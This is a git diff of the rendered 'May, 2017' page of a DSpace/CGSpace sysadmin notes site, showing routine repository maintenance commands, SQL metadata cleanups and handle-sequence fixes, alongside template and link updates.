... reload shell to get new Ruby
$ gem install sass -v 3.3.14
@ -585,15 +585,15 @@ $ gem install compass -v 1.0.3
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -7,7 +7,7 @@
<meta property="og:title" content="May, 2017" />
<meta property="og:description" content="2017-05-01 ICARDA apparently started working on CG Core on their MEL repository They have done a few cg.* fields, but not very consistent and even copy some of CGSpace items: https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full https://cgspace.cgiar.org/handle/10568/73683 2017-05-02 Atmire got back about the Workflow Statistics issue, and apparently it&rsquo;s a bug in the CUA module so they will send us a pull request 2017-05-04 Sync DSpace Test with database and assetstore from CGSpace Re-deploy DSpace Test with Atmire&rsquo;s CUA patch for workflow statistics, run system updates, and restart the server Now I can see the workflow statistics and am able to select users, but everything returns 0 items Megan says there are still some mapped items are not appearing since last week, so I forced a full index-discovery -b Need to remember to check if the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSPace Test) tomorrow: https://cgspace." />
<meta property="og:description" content="2017-05-01 ICARDA apparently started working on CG Core on their MEL repository They have done a few cg.* fields, but not very consistent and even copy some of CGSpace items: https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full https://cgspace.cgiar.org/handle/10568/73683 2017-05-02 Atmire got back about the Workflow Statistics issue, and apparently it&rsquo;s a bug in the CUA module so they will send us a pull request 2017-05-04 Sync DSpace Test with database and assetstore from CGSpace Re-deploy DSpace Test with Atmire&rsquo;s CUA patch for workflow statistics, run system updates, and restart the server Now I can see the workflow statistics and am able to select users, but everything returns 0 items Megan says there are still some mapped items are not appearing since last week, so I forced a full index-discovery -b Need to remember to check if the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSPace Test) tomorrow: https://cgspace." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2017-05/" />
<meta property="article:published_time" content="2017-05-01T16:21:52+02:00" />
@ -17,8 +17,8 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="May, 2017"/>
<meta name="twitter:description" content="2017-05-01 ICARDA apparently started working on CG Core on their MEL repository They have done a few cg.* fields, but not very consistent and even copy some of CGSpace items: https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full https://cgspace.cgiar.org/handle/10568/73683 2017-05-02 Atmire got back about the Workflow Statistics issue, and apparently it&rsquo;s a bug in the CUA module so they will send us a pull request 2017-05-04 Sync DSpace Test with database and assetstore from CGSpace Re-deploy DSpace Test with Atmire&rsquo;s CUA patch for workflow statistics, run system updates, and restart the server Now I can see the workflow statistics and am able to select users, but everything returns 0 items Megan says there are still some mapped items are not appearing since last week, so I forced a full index-discovery -b Need to remember to check if the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSPace Test) tomorrow: https://cgspace."/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="twitter:description" content="2017-05-01 ICARDA apparently started working on CG Core on their MEL repository They have done a few cg.* fields, but not very consistent and even copy some of CGSpace items: https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full https://cgspace.cgiar.org/handle/10568/73683 2017-05-02 Atmire got back about the Workflow Statistics issue, and apparently it&rsquo;s a bug in the CUA module so they will send us a pull request 2017-05-04 Sync DSpace Test with database and assetstore from CGSpace Re-deploy DSpace Test with Atmire&rsquo;s CUA patch for workflow statistics, run system updates, and restart the server Now I can see the workflow statistics and am able to select users, but everything returns 0 items Megan says there are still some mapped items are not appearing since last week, so I forced a full index-discovery -b Need to remember to check if the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSPace Test) tomorrow: https://cgspace."/>
<meta name="generator" content="Hugo 0.133.1">
@ -48,12 +48,12 @@
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -100,7 +100,7 @@
<time datetime="2017-05-01T16:21:52+02:00">Mon May 01, 2017</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -131,7 +131,7 @@
<li>Discovered that CGSpace has ~700 items that are missing the <code>cg.identifier.status</code> field</li>
<li>Need to perhaps try using the &ldquo;required metadata&rdquo; curation task to find items missing these fields:</li>
</ul>
<pre><code>$ [dspace]/bin/dspace curate -t requiredmetadata -i 10568/1 -r - &gt; /tmp/curation.out
<pre tabindex="0"><code>$ [dspace]/bin/dspace curate -t requiredmetadata -i 10568/1 -r - &gt; /tmp/curation.out
</code></pre><ul>
<li>It seems the curation task dies when it finds an item which has missing metadata</li>
</ul>
@ -145,7 +145,7 @@
<ul>
<li>Testing one replacement for CCAFS Flagships (<code>cg.subject.ccafs</code>), first changed in the submission forms, and then in the database:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i ccafs-flagships-may7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i ccafs-flagships-may7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p fuuu
</code></pre><ul>
<li>Also, CCAFS wants to re-order their flagships to prioritize the Phase II ones</li>
<li>Waiting for feedback from CCAFS, then I can merge <a href="https://github.com/ilri/DSpace/pull/320">#320</a></li>
@ -159,7 +159,7 @@
<li>This leads to tens of thousands of abandoned files in the assetstore, which need to be cleaned up using <code>dspace cleanup -v</code>, or else you&rsquo;ll run out of disk space</li>
<li>In the end I realized it&rsquo;s better to use submission mode (<code>-s</code>) to ingest the community object as a single AIP without its children, followed by each of the collections:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx2048m -XX:-UseGCOverheadLimit&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx2048m -XX:-UseGCOverheadLimit&#34;
$ [dspace]/bin/dspace packager -s -o ignoreHandle=false -t AIP -e some@user.com -p 10568/87775 /home/aorth/10947-1/10947-1.zip
$ for collection in /home/aorth/10947-1/COLLECTION@10947-*; do [dspace]/bin/dspace packager -s -o ignoreHandle=false -t AIP -e some@user.com -p 10947/1 $collection; done
$ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager -r -f -u -t AIP -e some@user.com $item; done
@ -184,13 +184,13 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<li>The CGIAR Library metadata has some blank metadata values, which leads to <code>|||</code> in the Discovery facets</li>
<li>Clean these up in the database using:</li>
</ul>
<pre><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
</code></pre><ul>
<li>I ended up running into issues during data cleaning and decided to wipe out the entire community and re-sync DSpace Test assetstore and database from CGSpace rather than waiting for the cleanup task to clean up</li>
<li>Hours into the re-ingestion I ran into more errors, and had to erase everything and start over <em>again</em>!</li>
<li>Now, no matter what I do I keep getting foreign key errors&hellip;</li>
</ul>
<pre><code>Caused by: org.postgresql.util.PSQLException: ERROR: duplicate key value violates unique constraint &quot;handle_pkey&quot;
<pre tabindex="0"><code>Caused by: org.postgresql.util.PSQLException: ERROR: duplicate key value violates unique constraint &#34;handle_pkey&#34;
Detail: Key (handle_id)=(80928) already exists.
</code></pre><ul>
<li>I think those errors actually come from me running the <code>update-sequences.sql</code> script while Tomcat/DSpace are running</li>
@ -202,7 +202,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<li>I clarified that the scope of the implementation should be that ORCIDs are stored in the database and exposed via REST / API like other fields</li>
<li>Finally finished importing all the CGIAR Library content, final method was:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx3072m -XX:-UseGCOverheadLimit&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx3072m -XX:-UseGCOverheadLimit&#34;
$ [dspace]/bin/dspace packager -r -a -t AIP -o skipIfParentMissing=true -e some@user.com -p 10568/80923 /home/aorth/10947-2517/10947-2517.zip
$ [dspace]/bin/dspace packager -r -a -t AIP -o skipIfParentMissing=true -e some@user.com -p 10568/80923 /home/aorth/10947-2515/10947-2515.zip
$ [dspace]/bin/dspace packager -r -a -t AIP -o skipIfParentMissing=true -e some@user.com -p 10568/80923 /home/aorth/10947-2516/10947-2516.zip
@ -215,7 +215,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<li>The <code>-XX:-UseGCOverheadLimit</code> JVM option helps with some issues in large imports</li>
<li>After this I ran the <code>update-sequences.sql</code> script (with Tomcat shut down), and cleaned up the 200+ blank metadata records:</li>
</ul>
<pre><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
</code></pre><h2 id="2017-05-13">2017-05-13</h2>
<ul>
<li>After quite a bit of troubleshooting with importing cleaned up data as CSV, it seems that there are actually <a href="https://en.wikipedia.org/wiki/Null_character">NUL</a> characters in the <code>dc.description.abstract</code> field (at least) on the lines where CSV importing was failing</li>
@ -230,7 +230,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<li>Merge changes to CCAFS project identifiers and flagships: <a href="https://github.com/ilri/DSpace/pull/320">#320</a></li>
<li>Run updates for CCAFS flagships on CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/ccafs-flagships-may7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/ccafs-flagships-may7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>
<p>These include:</p>
@ -258,19 +258,19 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<ul>
<li>Looking into the error I get when trying to create a new collection on DSpace Test:</li>
</ul>
<pre><code>ERROR: duplicate key value violates unique constraint &quot;handle_pkey&quot; Detail: Key (handle_id)=(84834) already exists.
<pre tabindex="0"><code>ERROR: duplicate key value violates unique constraint &#34;handle_pkey&#34; Detail: Key (handle_id)=(84834) already exists.
</code></pre><ul>
<li>I tried updating the sequences a few times, with Tomcat running and stopped, but it hasn&rsquo;t helped</li>
<li>It appears the item with <code>handle_id</code> 84834 is one of the imported CGIAR Library items:</li>
</ul>
<pre><code>dspace=# select * from handle where handle_id=84834;
<pre tabindex="0"><code>dspace=# select * from handle where handle_id=84834;
handle_id | handle | resource_type_id | resource_id
-----------+------------+------------------+-------------
84834 | 10947/1332 | 2 | 87113
</code></pre><ul>
<li>Looks like the max <code>handle_id</code> is actually much higher:</li>
</ul>
<pre><code>dspace=# select * from handle where handle_id=(select max(handle_id) from handle);
<pre tabindex="0"><code>dspace=# select * from handle where handle_id=(select max(handle_id) from handle);
handle_id | handle | resource_type_id | resource_id
-----------+----------+------------------+-------------
86873 | 10947/99 | 2 | 89153
@ -279,7 +279,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<li>I&rsquo;ve posted on the dspace-tech mailing list to see if I can just manually set the <code>handle_seq</code> to that value</li>
<li>Actually, it seems I can manually set the handle sequence using:</li>
</ul>
<pre><code>dspace=# select setval('handle_seq',86873);
<pre tabindex="0"><code>dspace=# select setval(&#39;handle_seq&#39;,86873);
</code></pre><ul>
<li>After that I can create collections just fine, though I&rsquo;m not sure if it has other side effects</li>
</ul>
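<ul>
<li>A more general form of that, deriving the value instead of hard-coding it (untested sketch):</li>
</ul>
<pre tabindex="0"><code>dspace=# select setval('handle_seq', (select max(handle_id) from handle));
</code></pre>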
@ -294,31 +294,31 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<li>Do some cleanups of community and collection names in CGIAR System Management Office community on DSpace Test, as well as move some items as Peter requested</li>
<li>Peter wanted a list of authors in here, so I generated a list of collections using the &ldquo;View Source&rdquo; on each community and this hacky awk:</li>
</ul>
<pre><code>$ grep 10947/ /tmp/collections | grep -v cocoon | awk -F/ '{print $3&quot;/&quot;$4}' | awk -F\&quot; '{print $1}' | vim -
<pre tabindex="0"><code>$ grep 10947/ /tmp/collections | grep -v cocoon | awk -F/ &#39;{print $3&#34;/&#34;$4}&#39; | awk -F\&#34; &#39;{print $1}&#39; | vim -
</code></pre><ul>
<li>Then I joined them together and ran this old SQL query from the dspace-tech mailing list which gives you authors for items in those collections:</li>
</ul>
<pre><code>dspace=# select distinct text_value
<pre tabindex="0"><code>dspace=# select distinct text_value
from metadatavalue
where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author')
where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;)
AND resource_type_id = 2
AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10947/2', '10947/3', '10947/1
0', '10947/4', '10947/5', '10947/6', '10947/7', '10947/8', '10947/9', '10947/11', '10947/25', '10947/12', '10947/26', '10947/27', '10947/28', '10947/29', '109
47/30', '10947/13', '10947/14', '10947/15', '10947/16', '10947/31', '10947/32', '10947/33', '10947/34', '10947/35', '10947/36', '10947/37', '10947/17', '10947
/18', '10947/38', '10947/19', '10947/39', '10947/40', '10947/41', '10947/42', '10947/43', '10947/2512', '10947/44', '10947/20', '10947/21', '10947/45', '10947
/46', '10947/47', '10947/48', '10947/49', '10947/22', '10947/23', '10947/24', '10947/50', '10947/51', '10947/2518', '10947/2776', '10947/2790', '10947/2521',
'10947/2522', '10947/2782', '10947/2525', '10947/2836', '10947/2524', '10947/2878', '10947/2520', '10947/2523', '10947/2786', '10947/2631', '10947/2589', '109
47/2519', '10947/2708', '10947/2526', '10947/2871', '10947/2527', '10947/4467', '10947/3457', '10947/2528', '10947/2529', '10947/2533', '10947/2530', '10947/2
531', '10947/2532', '10947/2538', '10947/2534', '10947/2540', '10947/2900', '10947/2539', '10947/2784', '10947/2536', '10947/2805', '10947/2541', '10947/2535'
, '10947/2537', '10568/93761')));
AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10947/2&#39;, &#39;10947/3&#39;, &#39;10947/1
0&#39;, &#39;10947/4&#39;, &#39;10947/5&#39;, &#39;10947/6&#39;, &#39;10947/7&#39;, &#39;10947/8&#39;, &#39;10947/9&#39;, &#39;10947/11&#39;, &#39;10947/25&#39;, &#39;10947/12&#39;, &#39;10947/26&#39;, &#39;10947/27&#39;, &#39;10947/28&#39;, &#39;10947/29&#39;, &#39;109
47/30&#39;, &#39;10947/13&#39;, &#39;10947/14&#39;, &#39;10947/15&#39;, &#39;10947/16&#39;, &#39;10947/31&#39;, &#39;10947/32&#39;, &#39;10947/33&#39;, &#39;10947/34&#39;, &#39;10947/35&#39;, &#39;10947/36&#39;, &#39;10947/37&#39;, &#39;10947/17&#39;, &#39;10947
/18&#39;, &#39;10947/38&#39;, &#39;10947/19&#39;, &#39;10947/39&#39;, &#39;10947/40&#39;, &#39;10947/41&#39;, &#39;10947/42&#39;, &#39;10947/43&#39;, &#39;10947/2512&#39;, &#39;10947/44&#39;, &#39;10947/20&#39;, &#39;10947/21&#39;, &#39;10947/45&#39;, &#39;10947
/46&#39;, &#39;10947/47&#39;, &#39;10947/48&#39;, &#39;10947/49&#39;, &#39;10947/22&#39;, &#39;10947/23&#39;, &#39;10947/24&#39;, &#39;10947/50&#39;, &#39;10947/51&#39;, &#39;10947/2518&#39;, &#39;10947/2776&#39;, &#39;10947/2790&#39;, &#39;10947/2521&#39;,
&#39;10947/2522&#39;, &#39;10947/2782&#39;, &#39;10947/2525&#39;, &#39;10947/2836&#39;, &#39;10947/2524&#39;, &#39;10947/2878&#39;, &#39;10947/2520&#39;, &#39;10947/2523&#39;, &#39;10947/2786&#39;, &#39;10947/2631&#39;, &#39;10947/2589&#39;, &#39;109
47/2519&#39;, &#39;10947/2708&#39;, &#39;10947/2526&#39;, &#39;10947/2871&#39;, &#39;10947/2527&#39;, &#39;10947/4467&#39;, &#39;10947/3457&#39;, &#39;10947/2528&#39;, &#39;10947/2529&#39;, &#39;10947/2533&#39;, &#39;10947/2530&#39;, &#39;10947/2
531&#39;, &#39;10947/2532&#39;, &#39;10947/2538&#39;, &#39;10947/2534&#39;, &#39;10947/2540&#39;, &#39;10947/2900&#39;, &#39;10947/2539&#39;, &#39;10947/2784&#39;, &#39;10947/2536&#39;, &#39;10947/2805&#39;, &#39;10947/2541&#39;, &#39;10947/2535&#39;
, &#39;10947/2537&#39;, &#39;10568/93761&#39;)));
</code></pre><ul>
<li>To get a CSV (with counts) from that:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*)
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*)
from metadatavalue
where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author')
where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;)
AND resource_type_id = 2
AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10947/2', '10947/3', '10947/10', '10947/4', '10947/5', '10947/6', '10947/7', '10947/8', '10947/9', '10947/11', '10947/25', '10947/12', '10947/26', '10947/27', '10947/28', '10947/29', '10947/30', '10947/13', '10947/14', '10947/15', '10947/16', '10947/31', '10947/32', '10947/33', '10947/34', '10947/35', '10947/36', '10947/37', '10947/17', '10947/18', '10947/38', '10947/19', '10947/39', '10947/40', '10947/41', '10947/42', '10947/43', '10947/2512', '10947/44', '10947/20', '10947/21', '10947/45', '10947/46', '10947/47', '10947/48', '10947/49', '10947/22', '10947/23', '10947/24', '10947/50', '10947/51', '10947/2518', '10947/2776', '10947/2790', '10947/2521', '10947/2522', '10947/2782', '10947/2525', '10947/2836', '10947/2524', '10947/2878', '10947/2520', '10947/2523', '10947/2786', '10947/2631', '10947/2589', '10947/2519', '10947/2708', '10947/2526', '10947/2871', '10947/2527', '10947/4467', '10947/3457', '10947/2528', '10947/2529', '10947/2533', '10947/2530', '10947/2531', '10947/2532', '10947/2538', '10947/2534', '10947/2540', '10947/2900', '10947/2539', '10947/2784', '10947/2536', '10947/2805', '10947/2541', '10947/2535', '10947/2537', '10568/93761'))) group by text_value order by count desc) to /tmp/cgiar-librar-authors.csv with csv;
AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10947/2&#39;, &#39;10947/3&#39;, &#39;10947/10&#39;, &#39;10947/4&#39;, &#39;10947/5&#39;, &#39;10947/6&#39;, &#39;10947/7&#39;, &#39;10947/8&#39;, &#39;10947/9&#39;, &#39;10947/11&#39;, &#39;10947/25&#39;, &#39;10947/12&#39;, &#39;10947/26&#39;, &#39;10947/27&#39;, &#39;10947/28&#39;, &#39;10947/29&#39;, &#39;10947/30&#39;, &#39;10947/13&#39;, &#39;10947/14&#39;, &#39;10947/15&#39;, &#39;10947/16&#39;, &#39;10947/31&#39;, &#39;10947/32&#39;, &#39;10947/33&#39;, &#39;10947/34&#39;, &#39;10947/35&#39;, &#39;10947/36&#39;, &#39;10947/37&#39;, &#39;10947/17&#39;, &#39;10947/18&#39;, &#39;10947/38&#39;, &#39;10947/19&#39;, &#39;10947/39&#39;, &#39;10947/40&#39;, &#39;10947/41&#39;, &#39;10947/42&#39;, &#39;10947/43&#39;, &#39;10947/2512&#39;, &#39;10947/44&#39;, &#39;10947/20&#39;, &#39;10947/21&#39;, &#39;10947/45&#39;, &#39;10947/46&#39;, &#39;10947/47&#39;, &#39;10947/48&#39;, &#39;10947/49&#39;, &#39;10947/22&#39;, &#39;10947/23&#39;, &#39;10947/24&#39;, &#39;10947/50&#39;, &#39;10947/51&#39;, &#39;10947/2518&#39;, &#39;10947/2776&#39;, &#39;10947/2790&#39;, &#39;10947/2521&#39;, &#39;10947/2522&#39;, &#39;10947/2782&#39;, &#39;10947/2525&#39;, &#39;10947/2836&#39;, &#39;10947/2524&#39;, &#39;10947/2878&#39;, &#39;10947/2520&#39;, &#39;10947/2523&#39;, &#39;10947/2786&#39;, &#39;10947/2631&#39;, &#39;10947/2589&#39;, &#39;10947/2519&#39;, &#39;10947/2708&#39;, &#39;10947/2526&#39;, &#39;10947/2871&#39;, &#39;10947/2527&#39;, &#39;10947/4467&#39;, &#39;10947/3457&#39;, &#39;10947/2528&#39;, &#39;10947/2529&#39;, &#39;10947/2533&#39;, &#39;10947/2530&#39;, &#39;10947/2531&#39;, &#39;10947/2532&#39;, &#39;10947/2538&#39;, &#39;10947/2534&#39;, &#39;10947/2540&#39;, &#39;10947/2900&#39;, &#39;10947/2539&#39;, &#39;10947/2784&#39;, &#39;10947/2536&#39;, &#39;10947/2805&#39;, &#39;10947/2541&#39;, &#39;10947/2535&#39;, &#39;10947/2537&#39;, &#39;10568/93761&#39;))) group by text_value order by count desc) to /tmp/cgiar-librar-authors.csv with csv;
</code></pre><h2 id="2017-05-23">2017-05-23</h2>
<ul>
<li>Add Affiliation to filters on Listing and Reports module (<a href="https://github.com/ilri/DSpace/pull/325">#325</a>)</li>
@ -326,7 +326,7 @@ AND resource_id IN (select item_id from collection2item where collection_id IN (
<li>For now I&rsquo;ve suggested that they just change the collection names and that we fix their metadata manually afterwards</li>
<li>Also, they have a lot of messed up values in their <code>cg.subject.wle</code> field so I will clean up some of those first:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id=119) to /tmp/wle.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id=119) to /tmp/wle.csv with csv;
COPY 111
</code></pre><ul>
<li>Respond to Atmire message about ORCIDs, saying that right now we&rsquo;d prefer to just have them available via REST API like any other metadata field, and that I&rsquo;m available for a Skype</li>
@ -343,21 +343,21 @@ COPY 111
<li>Communicate with MARLO people about progress on exposing ORCIDs via the REST API, as it is set to be discussed in the <a href="https://wiki.lyrasis.org/display/cmtygp/DCAT+Meeting+June+2017">June, 2017 DCAT meeting</a></li>
<li>Find all of Amos Omore&rsquo;s author name variations so I can link them to his authority entry that has an ORCID:</li>
</ul>
<pre><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like 'Omore, A%';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like &#39;Omore, A%&#39;;
</code></pre><ul>
<li>Set the authority for all variations to one containing an ORCID:</li>
</ul>
<pre><code>dspace=# update metadatavalue set authority='4428ee88-90ef-4107-b837-3c0ec988520b', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Omore, A%';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;4428ee88-90ef-4107-b837-3c0ec988520b&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Omore, A%&#39;;
UPDATE 187
</code></pre><ul>
<li>Next I need to do Edgar Twine:</li>
</ul>
<pre><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like 'Twine, E%';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like &#39;Twine, E%&#39;;
</code></pre><ul>
<li>But it doesn&rsquo;t look like any of his existing entries are linked to an authority which has an ORCID, so I edited the metadata via &ldquo;Edit this Item&rdquo; and looked up his ORCID and linked it there</li>
<li>Now I should be able to set his name variations to the new authority:</li>
</ul>
<pre><code>dspace=# update metadatavalue set authority='f70d0a01-d562-45b8-bca3-9cf7f249bc8b', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Twine, E%';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;f70d0a01-d562-45b8-bca3-9cf7f249bc8b&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Twine, E%&#39;;
</code></pre><ul>
<li>Run the corrections on CGSpace and then update discovery / authority (reindexing commands sketched below)</li>
<li>I notice that there are a handful of <code>java.lang.OutOfMemoryError: Java heap space</code> errors in the Catalina logs on CGSpace, I should go look into that&hellip;</li>
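<li>For reference, the reindexing commands I mean are roughly these (a sketch from memory; flags can differ between DSpace versions):</li>
</ul>
<pre tabindex="0"><code>$ [dspace]/bin/dspace index-discovery -b
$ [dspace]/bin/dspace index-authority
</code></pre>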
@ -391,15 +391,15 @@ UPDATE 187
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>


@ -7,7 +7,7 @@
<meta property="og:title" content="June, 2017" />
<meta property="og:description" content="2017-06-01 After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes The cg.identifier.wletheme field will be used for both Phase I and Phase II Research Themes Then we&rsquo;ll create a new sub-community for Phase II and create collections for the research themes there The current &ldquo;Research Themes&rdquo; community will be renamed to &ldquo;WLE Phase I Research Themes&rdquo; Tagged all items in the current Phase I collections with their appropriate themes Create pull request to add Phase II research themes to the submission form: #328 Add cg." />
<meta property="og:description" content="2017-06-01 After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes The cg.identifier.wletheme field will be used for both Phase I and Phase II Research Themes Then we&rsquo;ll create a new sub-community for Phase II and create collections for the research themes there The current &ldquo;Research Themes&rdquo; community will be renamed to &ldquo;WLE Phase I Research Themes&rdquo; Tagged all items in the current Phase I collections with their appropriate themes Create pull request to add Phase II research themes to the submission form: #328 Add cg." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2017-06/" />
<meta property="article:published_time" content="2017-06-01T10:14:52+03:00" />
@ -17,8 +17,8 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="June, 2017"/>
<meta name="twitter:description" content="2017-06-01 After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes The cg.identifier.wletheme field will be used for both Phase I and Phase II Research Themes Then we&rsquo;ll create a new sub-community for Phase II and create collections for the research themes there The current &ldquo;Research Themes&rdquo; community will be renamed to &ldquo;WLE Phase I Research Themes&rdquo; Tagged all items in the current Phase I collections with their appropriate themes Create pull request to add Phase II research themes to the submission form: #328 Add cg."/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="twitter:description" content="2017-06-01 After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes The cg.identifier.wletheme field will be used for both Phase I and Phase II Research Themes Then we&rsquo;ll create a new sub-community for Phase II and create collections for the research themes there The current &ldquo;Research Themes&rdquo; community will be renamed to &ldquo;WLE Phase I Research Themes&rdquo; Tagged all items in the current Phase I collections with their appropriate themes Create pull request to add Phase II research themes to the submission form: #328 Add cg."/>
<meta name="generator" content="Hugo 0.133.1">
@ -48,12 +48,12 @@
<!-- combined, minified CSS -->
